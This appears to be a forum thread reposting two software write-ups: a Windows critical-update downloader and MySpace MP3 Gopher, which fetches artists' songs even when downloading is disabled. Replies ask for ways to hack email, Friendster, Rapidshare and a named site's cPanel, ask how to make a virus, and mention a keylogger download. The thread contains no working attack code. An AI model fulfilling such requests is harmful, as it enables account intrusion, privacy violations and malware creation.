This is a small utility Jean-Sebastien Carle created that allows you to download all of the current Windows critical updates. All updates are downloaded directly from microsoft.com to your computer with a single mouse click.
http://www.raymond.cc/images/WUD.GIF
I see that this utility is more useful towards network administrators who would like to have all the Windows updates setup files distributed and installed on computer over the network. You wouldn't want to run Windows Update on all 100 computers or more at a time because it's time consuming and it takes up your internet bandwidth.
This utility is also useful if you'd like to create an unattended Windows installation CD. Just download all the Windows updates and slipstream all updates into Windows CD. The next time you install from the CD, you don't need to visit Windows Update.
Current Update Lists Included:
Exchange 2003 x86 ENU
Office 2003 x86 ENU
Windows 2000 Professional x86 FRA
Windows XP x86 ENU
Windows XP x86 FRA
Windows XP x86 ITA
Windows XP x86 SVE
Windows 2003 Server x86 FRA
You MUST have the .NET 2.0 Framework installed for this utility to function.

DOWNLOAD HERE:
http://www.jcarle.com/public/utilities/WUD221B295.zip
<LI y4ojZ="0" lPyf5="0">

This is a small utility Jean-Sebastien Carle created that allows you to download all of the current Windows critical updates. All updates are downloaded directly from microsoft.com to your computer with a single mouse click.

Late last year the popular MySpace MP3 Gopher was unusable for months because MySpace has updated their code and the author, Andrew Heinlein has promised a working version on Christmas. Many months has passed but still no news of the new version of MySpace Mp3 Gopher. Suddenly on March 2007, Andrew announced Replay Media Catcher which is able to capture video and audio easily from many websites including MySpace but it is a shareware. Everyone thought that MySpace MP3 Gopher has been replaced by Replay Media Catcher.
MySpace MP3 Gopher went quiet for a while but now it's back in business!

http://www.raymond.cc/images/MySpaceMP3Gopher2.gif

Andrew Heinlein found an old version of MySpace MP3 Gopher from back in September 2006 that still works! He updated it to the latest build and it's now working and able to download an artist's MP3 file from MySpace even if the downloading of said song is disabled.
To download MP3 file from a user in MySpace using MySpace MP3 Gopher, you need to know the Friend ID. To find out the Friend ID, just move your mouse over to the MySpace friend's picture. The friend ID will be displayed at the Status Bar of your web browser.
http://www.raymond.cc/images/myspace-friendID.gif
MySpace MP3 Gopher works on Windows 2000, XP and even Vista. MP3 Gopher supports multiple instances. Meaning you can open more than one MySpace MP3 Gopher to download more than 1 MP3 at a time. This way you're able to get a whole album quickly. Another easy way to capture and download MySpace MP3 is to use your web browser.

DOWNLOAD HERE:
http://mouseindustries.com/gopher/bin/MySpaceMp3Gopher.zip

wahahaha pinarurusahan talaga ako ng mod sige na nga ..... madami pa susunod dyan masakit na lang mata ko

You Want more PC Tuts?

:cool1: :cool1: :cool1: hey..
thanks a lot for all your post..
it was really useful dude..
but..
could you hack a rapidshare premium account???
tell me how to do it..
pls..pls..pls..
i really need a premium account to download things..

thanks a lot anyway..:cool1: :cool1: :cool1:

nyahaha, astig ka talaga pareng uluk...:cheers:

please post na po yong breaking into email accounts lalo na sa yahoo :guns:

and kung pwede friendster account din po :cop:

the link for the vnc and keylogger is broken.. please reupload... thanks...

can some one please tell me how to hack a site cpanel i realy want to know cos there is a site cheating on us dealey in registeration and wasting time
they even charges close to what we pay for registeration.
here is the site address www.jamb.org.ng i need help plzz.

man do you also know how to leech Friendster my private photo? Please teach us???

not all add ware is safe and one thing hacking tools are detected as a trojan viruses even they are not, because they are an illegal ware or application antivirus detected them as a trojan viruses

Note: dont trust anybody sharing hacking tools in web because some of them are trippers.

Thanku sooo much .its really nice tricks.,
Bro can u post how to make virus just info? Plz